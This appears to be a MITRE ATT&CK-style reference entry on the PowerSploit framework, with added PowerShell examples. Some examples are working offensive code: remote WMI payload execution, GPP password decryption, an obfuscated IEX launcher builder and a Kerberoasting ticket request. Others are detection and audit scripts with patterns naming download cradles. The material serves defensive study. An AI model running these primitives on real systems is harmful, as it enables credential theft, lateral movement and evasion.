PowerSploit

PowerSploit is an open-source offensive security framework composed of PowerShell modules and scripts that perform a wide range of penetration-testing tasks such as code execution, persistence, anti-virus bypass, reconnaissance, and exfiltration. [1] [2] [3]

ID: S0194
Type: TOOL
Platforms: Windows
Version: 1.6
Created: 18 April 2018
Last Modified: 17 August 2023

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows Management Instrumentation

PowerSploit's Invoke-WmiCommand CodeExecution module uses WMI to execute and retrieve the output from a PowerShell payload.[1][3]
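The primitive behind Invoke-WmiCommand, as an added example that is not PowerSploit's own code: the Win32_Process.Create WMI method starts powershell.exe on the remote host but only returns a PID, so the payload parks its output in a registry value and the caller reads it back over WMI with StdRegProv and then deletes it. The function name, the target hostname and the credential are assumptions; the caller needs local-admin rights on the target and DCOM reachability.

```powershell
# Added example (not PowerSploit code): WMI process creation plus registry
# channel for output, the pattern Invoke-WmiCommand is built on.
function Invoke-WmiPowerShell {
    param(
        [Parameter(Mandatory)][string]$Target,          # assumed hostname, e.g. ws01.corp.example
        [Parameter(Mandatory)][pscredential]$Credential,
        [Parameter(Mandatory)][string]$ScriptText,      # PowerShell to run on the target
        [int]$TimeoutSeconds = 30
    )
    $HKLM      = [uint32]2147483650                     # 0x80000002, HKEY_LOCAL_MACHINE
    $KeyPath   = 'SOFTWARE\Microsoft\Windows\CurrentVersion'
    $ValueName = 'WmiOut_' + [guid]::NewGuid().ToString('N')

    # Wrap the caller's script: capture all output and store it base64-encoded
    # in a registry value that the caller can read remotely.
    $Wrapped = @"
`$o = & { $ScriptText } 2>&1 | Out-String
`$b = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(`$o))
New-ItemProperty -Path 'HKLM:\$KeyPath' -Name '$ValueName' -Value `$b -PropertyType String -Force | Out-Null
"@
    $Enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Wrapped))
    $CommandLine = "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand $Enc"

    # 1. Spawn the process. On the target its parent is WmiPrvSE.exe, which is
    #    the detection hook for this technique (Sysmon Event 1 / Security 4688).
    $r = Invoke-WmiMethod -ComputerName $Target -Credential $Credential `
            -Class Win32_Process -Name Create -ArgumentList $CommandLine
    if ($r.ReturnValue -ne 0) { throw "Win32_Process.Create failed with code $($r.ReturnValue)" }

    # 2. Poll the remote registry for the result, then remove the value again.
    $reg = Get-WmiObject -ComputerName $Target -Credential $Credential `
             -Namespace 'root\default' -List | Where-Object { $_.Name -eq 'StdRegProv' }
    $deadline = (Get-Date).AddSeconds($TimeoutSeconds)
    do {
        Start-Sleep -Milliseconds 500
        $res = $reg.GetStringValue($HKLM, $KeyPath, $ValueName)
    } until ($res.ReturnValue -eq 0 -or (Get-Date) -gt $deadline)
    if ($res.ReturnValue -ne 0) { throw "Timed out waiting for output of PID $($r.ProcessId)" }

    $null = $reg.DeleteValue($HKLM, $KeyPath, $ValueName)
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($res.sValue))
}

# Usage (assumed host and credential):
# Invoke-WmiPowerShell -Target 'ws01.corp.example' -Credential (Get-Credential) -ScriptText 'whoami /all'
```

Two things to watch from the defender's side: the spawned powershell.exe has WmiPrvSE.exe as its parent and carries a long -EncodedCommand argument, and the registry write and delete show up as RegistryEvent (Sysmon 12/13) under a key that normal software rarely touches with random value names.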

Enterprise T1555 .004 Credentials from Password Stores: Windows Credential Manager

PowerSploit contains a collection of Exfiltration modules that can harvest credentials from Windows vault credential objects.[1][3]

Enterprise T1005 Data from Local System

PowerSploit contains a collection of Exfiltration modules that can access data from local files, volumes, and processes.[1][3]

Enterprise T1543 .003 Create or Modify System Process: Windows Service

PowerSploit contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs.[1][3]

Enterprise T1574 .001 Hijack Execution Flow: DLL Search Order Hijacking

PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes.[1][3]

.007 Hijack Execution Flow: Path Interception by PATH Environment Variable

PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit path interception opportunities in the PATH environment variable.[1][3]

.008 Hijack Execution Flow: Path Interception by Search Order Hijacking

PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit search order hijacking vulnerabilities.[1][3]

.009 Hijack Execution Flow: Path Interception by Unquoted Path

PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit unquoted path vulnerabilities.[1][3]
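The service and PATH checks above, rewritten as a read-only audit. This is an added example, not PowerUp's code: it reproduces the logic of the unquoted-path, modifiable-service-binary and writable-PATH checks by actually trying to create a file in each candidate location, because ACL inspection alone misjudges inherited and deny entries. Run it as the low-privileged user whose reach you want to measure; the function names are this example's own.

```powershell
# Added example (not PowerSploit code): what PowerUp's Get-ServiceUnquoted and
# Get-ModifiableServiceFile look for, plus writable entries in the machine PATH.
function Test-WritableDirectory {
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ('.probe_' + [guid]::NewGuid().ToString('N'))
    try {
        [IO.File]::WriteAllText($probe, '')           # creating a file is the real test
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch { return $false }
}

function Test-WritableFile {
    param([string]$File)
    # A running service binary is locked regardless of ACL, so a $false here
    # is not proof of safety; the directory check below covers that case.
    try {
        $fs = [IO.File]::Open($File, 'Open', 'Write', 'ReadWrite')
        $fs.Dispose()
        return $true
    } catch { return $false }
}

# Returns the executable part of a service PathName (quoted or not).
function Get-ServiceExePath {
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    $i = $PathName.IndexOf('.exe', [StringComparison]::OrdinalIgnoreCase)
    if ($i -ge 0) { return $PathName.Substring(0, $i + 4) }
    return ($PathName -split ' ')[0]
}

function Find-ServicePathWeakness {
    $serviceFindings = @(foreach ($svc in Get-CimInstance Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ServiceExePath $svc.PathName

        # 1. Unquoted path with spaces: the SCM tries C:\Program.exe, then
        #    C:\Program Files\Some.exe, ... before reaching the real binary.
        if ($svc.PathName -notmatch '^"' -and $exe -match ' ') {
            $parts = $exe -split ' '
            for ($n = 1; $n -lt $parts.Count; $n++) {
                $candidate = ($parts[0..($n - 1)] -join ' ') + '.exe'
                if (Test-WritableDirectory (Split-Path $candidate -Parent)) {
                    [pscustomobject]@{ Service = $svc.Name; Issue = 'UnquotedPath'; Target = $candidate; RunsAs = $svc.StartName }
                }
            }
        }
        # 2. Service binary, or the directory it lives in, writable by this user.
        if ((Test-Path -LiteralPath $exe) -and (Test-WritableFile $exe)) {
            [pscustomobject]@{ Service = $svc.Name; Issue = 'WritableBinary'; Target = $exe; RunsAs = $svc.StartName }
        }
        elseif (Test-WritableDirectory (Split-Path $exe -Parent)) {
            [pscustomobject]@{ Service = $svc.Name; Issue = 'WritableBinaryDir'; Target = (Split-Path $exe -Parent); RunsAs = $svc.StartName }
        }
    })
    # 3. Writable entries in the machine PATH, which services and other
    #    privileged processes inherit; this is the precondition for T1574.007.
    $machinePath = [Environment]::GetEnvironmentVariable('PATH', 'Machine') -split ';' | Where-Object { $_ }
    $pathFindings = @(foreach ($d in $machinePath) {
        if (Test-WritableDirectory $d) {
            [pscustomobject]@{ Service = '(system PATH)'; Issue = 'WritablePathDir'; Target = $d; RunsAs = 'n/a' }
        }
    })
    ($serviceFindings + $pathFindings) | Sort-Object Issue, Service
}

Find-ServicePathWeakness | Format-Table -AutoSize
```

The RunsAs column is what turns a finding into a privilege-escalation path: a writable location only matters when the service that will load from it runs as LocalSystem or another account with more rights than the user who can write there.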

Enterprise T1620 Reflective Code Loading

PowerSploit reflectively loads a Windows PE file into a process.[1][3]

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

PowerSploit's New-UserPersistenceOption Persistence argument can be used to establish persistence via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry key.[1][3]

.005 Boot or Logon Autostart Execution: Security Support Provider

PowerSploit's Install-SSP Persistence module can be used to establish persistence by installing an SSP DLL.[1][3]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

PowerSploit modules are written in and executed via PowerShell.[1][3]

Enterprise T1482 Domain Trust Discovery

PowerSploit has modules such as Get-NetDomainTrust and Get-NetForestTrust to enumerate domain and forest trusts.[1][3]

Enterprise T1113 Screen Capture

PowerSploit's Get-TimedScreenshot Exfiltration module can take screenshots at regular intervals.[1][3]

Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

PowerSploit contains a collection of Exfiltration modules that can harvest credentials using Mimikatz.[1][3]

Enterprise T1552 .002 Unsecured Credentials: Credentials in Registry

PowerSploit has several modules that search the Windows Registry and on-disk configuration files for stored credentials: Get-UnattendedInstallFile, Get-Webconfig, Get-ApplicationHost, Get-SiteListPassword, Get-CachedGPPPassword, and Get-RegistryAutoLogon.[4]

.006 Unsecured Credentials: Group Policy Preferences

PowerSploit contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences.[1][3]
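Why both of the credential sources above are "unsecured", as an added example that is not PowerSploit's code: Group Policy Preference cpassword values are AES-256-CBC under the key Microsoft published in MS-GPPREF, so any domain user who can read SYSVOL can decrypt them, and Winlogon autologon stores its password as a plain registry string. The Groups.xml below is constructed for the example (its cpassword is produced by the same routine run forward), nothing is read from a real SYSVOL, and the function names are this example's own.

```powershell
# Added example (not PowerSploit code): GPP cpassword decryption and the
# Winlogon autologon registry check.
$GppKey = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                   0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

function New-GppCipher {
    $aes = [Security.Cryptography.Aes]::Create()
    $aes.Key = $GppKey
    $aes.IV = New-Object byte[] 16            # zero IV, as the format specifies
    $aes.Mode = 'CBC'; $aes.Padding = 'PKCS7'
    $aes
}

function ConvertFrom-GppPassword {
    param([Parameter(Mandatory)][string]$CPassword)
    # cpassword drops the base64 padding; restore it to a multiple of 4.
    $b64 = $CPassword.PadRight($CPassword.Length + (4 - $CPassword.Length % 4) % 4, '=')
    $data = [Convert]::FromBase64String($b64)
    $plain = (New-GppCipher).CreateDecryptor().TransformFinalBlock($data, 0, $data.Length)
    [Text.Encoding]::Unicode.GetString($plain)
}

function ConvertTo-GppPassword {          # the inverse, used here only to build the sample
    param([Parameter(Mandatory)][string]$Password)
    $data = [Text.Encoding]::Unicode.GetBytes($Password)
    $enc = (New-GppCipher).CreateEncryptor().TransformFinalBlock($data, 0, $data.Length)
    [Convert]::ToBase64String($enc).TrimEnd('=')
}

function Find-GppPassword {
    param([Parameter(Mandatory)][string]$Xml)
    # Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml and Drives.xml
    # all carry cpassword on a Properties element next to an account name.
    foreach ($p in ([xml]$Xml).SelectNodes('//Properties[@cpassword]')) {
        $user = $p.userName
        if (-not $user) { $user = $p.accountName }
        if (-not $user) { $user = $p.runAs }
        [pscustomobject]@{ User = $user; Password = ConvertFrom-GppPassword $p.cpassword; NewName = $p.newName }
    }
}

function Get-AutoLogonCredential {
    # The same values Get-RegistryAutoLogon reads; DefaultPassword is plaintext.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $w = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if ($w -and $w.AutoAdminLogon -eq '1' -and $w.DefaultPassword) {
        [pscustomobject]@{ Domain = $w.DefaultDomainName; User = $w.DefaultUserName; Password = $w.DefaultPassword }
    }
}

# Constructed sample, shaped like SYSVOL\...\Machine\Preferences\Groups\Groups.xml:
$sampleGroupsXml = @"
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="localadmin" changed="2014-05-01 09:00:00">
    <Properties action="U" newName="" cpassword="$(ConvertTo-GppPassword 'Summer2014!')" userName="localadmin"/>
  </User>
</Groups>
"@

Find-GppPassword -Xml $sampleGroupsXml          # User localadmin, Password Summer2014!
Get-AutoLogonCredential

# Against a real domain (assumed path layout), read-only:
# Get-ChildItem "\\$env:USERDNSDOMAIN\SYSVOL" -Recurse -Filter *.xml -ErrorAction SilentlyContinue |
#     ForEach-Object { Find-GppPassword -Xml (Get-Content -LiteralPath $_.FullName -Raw) }
```

Patching the client (MS14-025) stops new cpassword values from being written but does not remove existing ones from SYSVOL, so the scan is still worth running on domains that predate the patch.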

Enterprise T1012 Query Registry

PowerSploit contains a collection of Privesc-PowerUp modules that can query Registry keys for potential opportunities.[1][3]

Enterprise T1027 .005 Obfuscated Files or Information: Indicator Removal from Tools

PowerSploit's Find-AVSignature AntivirusBypass module can be used to locate the bytes that a single anti-virus signature matches on.[1][3]

.010 Obfuscated Files or Information: Command Obfuscation

PowerSploit contains a collection of ScriptModification modules that compress and encode scripts and payloads.[1][3]
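The shape of payload those ScriptModification modules produce, and the analyst's inverse. This is an added example, not PowerSploit's code: ConvertTo-EncodedLauncher DEFLATE-compresses a script, base64-encodes it, wraps it in a one-line decompress-and-Invoke-Expression stub and hands that stub to powershell.exe as a UTF-16LE base64 -EncodedCommand; ConvertFrom-EncodedLauncher unwraps both layers from a command line taken out of a 4688 or Sysmon event. The stub text and function names are this example's own, and the sample script is constructed.

```powershell
# Added example (not PowerSploit code): build and unwrap a compressed,
# base64-encoded PowerShell launcher.
function ConvertTo-EncodedLauncher {
    param([Parameter(Mandatory)][string]$Script)
    $ms = New-Object IO.MemoryStream
    $ds = New-Object IO.Compression.DeflateStream($ms, [IO.Compression.CompressionMode]::Compress)
    $bytes = [Text.Encoding]::UTF8.GetBytes($Script)
    $ds.Write($bytes, 0, $bytes.Length); $ds.Dispose()        # Dispose flushes the deflate block
    $inner = [Convert]::ToBase64String($ms.ToArray())
    $stub = "IEX (New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream(" +
            "(New-Object IO.MemoryStream(,[Convert]::FromBase64String('$inner')))," +
            "[IO.Compression.CompressionMode]::Decompress),[Text.Encoding]::UTF8)).ReadToEnd()"
    $enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stub))
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc $enc"
}

function ConvertFrom-EncodedLauncher {
    param([Parameter(Mandatory)][string]$CommandLine)
    # powershell.exe accepts -e, -ec, -en, -enc ... as prefixes of -EncodedCommand;
    # the pattern deliberately does not match -Exec / -ExecutionPolicy.
    if ($CommandLine -notmatch '(?i)\s-e(c|n\w*)?\s+([A-Za-z0-9+/=]+)') {
        throw 'no -EncodedCommand argument found'
    }
    $stub = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2]))
    $layers = @($stub)
    # Second layer: an inner FromBase64String('...') feeding a Deflate or Gzip decompressor.
    if ($stub -match "FromBase64String\('([A-Za-z0-9+/=]+)'\)") {
        $raw = [Convert]::FromBase64String($Matches[1])
        $in  = New-Object IO.MemoryStream(,$raw)
        $dec = if ($stub -match 'GzipStream') {
            New-Object IO.Compression.GzipStream($in, [IO.Compression.CompressionMode]::Decompress)
        } else {
            New-Object IO.Compression.DeflateStream($in, [IO.Compression.CompressionMode]::Decompress)
        }
        $layers += (New-Object IO.StreamReader($dec, [Text.Encoding]::UTF8)).ReadToEnd()
    }
    [pscustomobject]@{ Stub = $layers[0]; Script = $layers[-1] }
}

# Round trip on a constructed script; the payload is decoded, never executed.
$sample  = 'Get-ChildItem C:\Users -Directory | Select-Object -ExpandProperty Name'
$cmd     = ConvertTo-EncodedLauncher -Script $sample
$decoded = ConvertFrom-EncodedLauncher -CommandLine $cmd
if ($decoded.Script -ne $sample) { throw 'round trip failed' }
$cmd.Length            # the encoded command line is several times longer than the script
$decoded.Script
```

Because the outer layer is only base64 over UTF-16LE, the encoding hides nothing from anyone who logs command lines; what it defeats is string matching on the raw script, and PowerShell Script Block Logging (Event 4104) records the decompressed script once the stub runs it.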

Enterprise T1558 .003 Steal or Forge Kerberos Tickets: Kerberoasting

PowerSploit's Invoke-Kerberoast module can request service tickets and return crackable ticket hashes.[5][6]
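Both sides of Kerberoasting, as an added example that is not PowerSploit's code. Request-ServiceTicket shows the primitive Invoke-Kerberoast is built on: a TGS-REQ for an SPN issued through the .NET KerberosRequestorSecurityToken class, which any authenticated domain user can do; the AP-REQ it returns contains the service ticket encrypted under the service account's key. Get-KerberoastCandidates is the matching detection over Event 4769 on a domain controller, looking for one account requesting many distinct service tickets, especially RC4 (encryption type 0x17) ones, in a short window. The SPN, the window and the thresholds are assumptions.

```powershell
# Added example (not PowerSploit code): TGS request primitive and 4769 detection.
Add-Type -AssemblyName System.IdentityModel

function Request-ServiceTicket {
    param([Parameter(Mandatory)][string]$Spn)     # e.g. 'MSSQLSvc/db01.corp.example:1433' (assumed)
    # Constructing the token sends the TGS-REQ and caches the ticket (visible in klist);
    # GetRequest() returns the AP-REQ bytes that carry the encrypted ticket.
    $tok = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $Spn
    $apReq = $tok.GetRequest()
    [pscustomobject]@{ Spn = $Spn; ApReqBytes = $apReq.Length; ValidTo = $tok.ValidTo }
}

function Get-KerberoastCandidates {
    param([int]$Hours = 24, [int]$MinDistinctServices = 5)
    $events = Get-WinEvent -FilterHashtable @{
        LogName = 'Security'; Id = 4769; StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue

    $requests = foreach ($e in $events) {
        $d = @{}
        foreach ($n in ([xml]$e.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if ($d.Status -ne '0x0') { continue }              # failed requests yield no ticket
        if ($d.ServiceName -like 'krbtgt*') { continue }   # TGT renewals
        if ($d.ServiceName -like '*$') { continue }        # machine accounts: long random keys, routine noise
        [pscustomobject]@{
            Time = $e.TimeCreated; User = $d.TargetUserName; Ip = $d.IpAddress
            Service = $d.ServiceName; Rc4 = ($d.TicketEncryptionType -eq '0x17')
        }
    }
    $requests | Group-Object User, Ip | ForEach-Object {
        $services = @($_.Group.Service | Sort-Object -Unique)
        $rc4 = @($_.Group | Where-Object Rc4).Count
        if ($services.Count -ge $MinDistinctServices -or $rc4 -ge $MinDistinctServices) {
            [pscustomobject]@{
                User = $_.Group[0].User; SourceIp = $_.Group[0].Ip
                DistinctServices = $services.Count; Rc4Tickets = $rc4
                FirstSeen = ($_.Group.Time | Measure-Object -Minimum).Minimum
                LastSeen  = ($_.Group.Time | Measure-Object -Maximum).Maximum
            }
        }
    }
}

# Any domain user:        Request-ServiceTicket -Spn 'MSSQLSvc/db01.corp.example:1433'
# On a DC, as an admin:   Get-KerberoastCandidates -Hours 1 | Format-Table -AutoSize
```

The RC4 filter matters because tools request RC4 tickets on purpose where the account allows them: RC4 tickets are keyed from the NT hash and crack far faster than AES ones, so a burst of 0x17 tickets on a domain that otherwise issues AES is a strong signal even at low counts.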

Enterprise T1134 Access Token Manipulation

PowerSploit's Invoke-TokenManipulation Exfiltration module can be used to manipulate tokens.[1][3]

Enterprise T1087 .001 Account Discovery: Local Account

PowerSploit's Get-ProcessTokenGroup Privesc-PowerUp module can enumerate all SIDs associated with its current token.[1][3]

Enterprise T1056 .001 Input Capture: Keylogging

PowerSploit's Get-Keystrokes Exfiltration module can log keystrokes.[1][3]

Enterprise T1057 Process Discovery

PowerSploit's Get-ProcessTokenPrivilege Privesc-PowerUp module can enumerate privileges for a given process.[1][3]

Enterprise T1055 .001 Process Injection: Dynamic-link Library Injection

PowerSploit contains a collection of CodeExecution modules that inject code (DLL, shellcode) into a process.[1][3]

Enterprise T1123 Audio Capture

PowerSploit's Get-MicrophoneAudio Exfiltration module can record system microphone audio.[1][3]

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

PowerSploit's New-UserPersistenceOption Persistence argument can be used to establish persistence via a Scheduled Task/Job.[1][3]
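A read-only audit of the three autostart locations the Persistence entries above (Registry Run keys, Security Support Provider, Scheduled Task) write to. This is an added example, not PowerSploit's code: it lists Run/RunOnce values, the LSA "Security Packages" entries that Install-SSP extends, and scheduled tasks whose action is PowerShell, and flags the encoded-command and download-cradle patterns that script-based persistence relies on. The SSP baseline is an assumed list of the package names Windows ships with and should be adjusted for your build; the function names are this example's own.

```powershell
# Added example (not PowerSploit code): autostart audit for Run keys, SSPs and tasks.
$EncodedOrCradle = '(?i)\s-e(c|n\w*)?\s|FromBase64String|DownloadString|Invoke-Expression|\bIEX\b'

function Get-RunKeyEntries {
    $paths = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
             'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
             'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
             'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
             'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
    foreach ($p in $paths) {
        if (-not (Test-Path $p)) { continue }
        $item = Get-Item $p
        foreach ($name in $item.GetValueNames()) {
            $cmd = [string]$item.GetValue($name)
            [pscustomobject]@{
                Location = $p; Name = $name; Command = $cmd
                Suspicious = ($cmd -match '(?i)powershell|pwsh') -and ($cmd -match $EncodedOrCradle)
            }
        }
    }
}

function Get-SspEntries {
    $known = @('kerberos','msv1_0','schannel','wdigest','tspkg','pku2u','cloudap','negoexts')   # assumed baseline
    foreach ($key in 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa',
                     'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig') {
        $pkgs = (Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
        foreach ($pkg in @($pkgs)) {
            if (-not $pkg -or $pkg -eq '""') { continue }          # some builds store a literal ""
            # LSA loads <name>.dll from System32; anything unsigned or off-baseline needs a look.
            $dll = Join-Path $env:SystemRoot "System32\$pkg.dll"
            $sig = if (Test-Path -LiteralPath $dll) { (Get-AuthenticodeSignature -FilePath $dll).Status } else { 'missing' }
            [pscustomobject]@{ Key = $key; Package = $pkg; Baseline = ($known -contains $pkg); Dll = $dll; Signature = $sig }
        }
    }
}

function Get-PowerShellTasks {
    foreach ($task in Get-ScheduledTask) {
        foreach ($a in $task.Actions) {
            $line = "$($a.Execute) $($a.Arguments)"
            if ($line -notmatch '(?i)powershell|pwsh') { continue }
            [pscustomobject]@{
                Task    = $task.TaskPath + $task.TaskName
                RunAs   = $task.Principal.UserId
                Trigger = ($task.Triggers | ForEach-Object { $_.CimClass.CimClassName -replace '^MSFT_Task', '' }) -join ','
                Command = $line
                Suspicious = ($line -match $EncodedOrCradle) -or ($line -match '(?i)-w(indowstyle)?\s+hidden')
            }
        }
    }
}

Get-RunKeyEntries   | Where-Object Suspicious | Format-Table -AutoSize
Get-SspEntries      | Where-Object { -not $_.Baseline -or $_.Signature -ne 'Valid' } | Format-Table -AutoSize
Get-PowerShellTasks | Where-Object Suspicious | Format-Table -AutoSize
```

Reading the "Security Packages" value needs no special rights, but a new SSP only takes effect after LSASS reloads, so a freshly planted entry can sit unloaded until the next reboot; compare the registry list against the modules actually loaded in lsass.exe rather than trusting either alone.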

Groups That Use This Software

Campaigns

ID Name Description
C0004 CostaRicto

During CostaRicto, threat actors used PowerSploit's Invoke-ReflectivePEInjection module.[17]

C0014 Operation Wocao

During Operation Wocao, threat actors used PowerSploit's Invoke-Kerberoast module to retrieve encrypted service tickets and brute-force the passwords.[18]

References